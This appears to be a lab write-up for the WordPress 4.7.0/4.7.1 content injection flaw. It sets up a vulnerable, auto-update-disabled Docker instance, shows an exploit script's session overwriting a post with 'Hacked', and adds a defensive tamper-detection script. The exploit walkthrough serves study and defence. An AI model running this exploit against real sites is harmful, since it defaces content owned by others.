Preparation
Create a docker-compose.yml file to build the Docker environment.
version: '2'
services:
  wordpress:
    image: wordpress:4.7.0
    ports:
      - 8080:80
    environment:
      WORDPRESS_DB_PASSWORD: example
    entrypoint:
      - /bin/sh
      - -c
      # Disable core auto-updates so the lab stays on 4.7.0, then start Apache.
      - (sleep 5; echo "define('WP_AUTO_UPDATE_CORE', false);" >> /var/www/html/wp-config.php) & docker-entrypoint.sh apache2-foreground
  mysql:
    image: mariadb
    environment:
      MYSQL_ROOT_PASSWORD: example
Build the Docker environment with the command below:
$ sudo docker-compose up --force-recreate; sudo docker-compose down -v
Wait for the deployment to finish, then visit http://localhost:8080/. Then install WordPress as usual. In wp-admin, go to Settings -> Permalink and select Post Name.
Solution
For the exploitation, use the exploit.py file and run it as shown in the output below.
$ sudo python exploit.py
[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]
[x] Enter the URL: http://localhost:8080/
[?] Please wait ...
[x] Wordpress Version: 4.7
[x] It's affected version. It seems vulnerable, continue? [y/n] y
[x] Parsing data information, please wait ...
[x] Post ID: 1
[x] Post Title: Hello world!
[x] Post URL: http://localhost:8080/hello-world/
[x] Post Content: <p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>
[SNIPPET]
[x] Enter ID Content that you want to overwrite: 1
[x] Change title: Hacked
=> 1. Load data from file.
=> 2. Input data.
[x] Change content by [1/2] ? 2
[?] Input data: hacked
[x] Exploit in progress ...
[x] Update success!
[?] Continue ? [y/n] n
Here is the result.
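A defender-side check for the change made in the session above, as an added example that is not part of the original write-up or of exploit.py: it flags the versions named in the exploit banner and compares a stored fingerprint of each post's title and content with the current state. The function names, the post dictionary layout (id, title, content) and the sample data are assumptions made for this example.

```python
import hashlib
import re

# Versions named in the exploit banner on this page.
AFFECTED = {(4, 7, 0), (4, 7, 1)}

def parse_version(text):
    """'4.7' -> (4, 7, 0); WordPress reports an x.y.0 release as 'x.y'."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)

def is_affected(version_text):
    return parse_version(version_text) in AFFECTED

def fingerprint(post):
    """SHA-256 over the two fields the session above overwrites."""
    data = post["title"] + "\x00" + post["content"]
    return hashlib.sha256(data.encode("utf-8")).hexdigest()

def snapshot(posts):
    return {p["id"]: fingerprint(p) for p in posts}

def changed_posts(baseline, current_posts):
    """Compare a stored snapshot with the posts as they are now."""
    current = snapshot(current_posts)
    return {
        "modified": sorted(i for i in current
                           if i in baseline and current[i] != baseline[i]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }

# Constructed sample data: post 1 mirrors the session above, post 5 is made up.
BEFORE = [
    {"id": 1, "title": "Hello world!",
     "content": "<p>Welcome to WordPress. This is your first post. "
                "Edit or delete it, then start writing!</p>"},
    {"id": 5, "title": "Release notes", "content": "<p>Nothing new.</p>"},
]
AFTER = [
    {"id": 1, "title": "Hacked", "content": "hacked"},
    BEFORE[1],
]

if __name__ == "__main__":
    print("4.7 affected:", is_affected("4.7"))
    print(changed_posts(snapshot(BEFORE), AFTER))
```

Take the baseline snapshot right after publishing and store it outside the web server, so a later comparison does not depend on data the site itself can change.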
References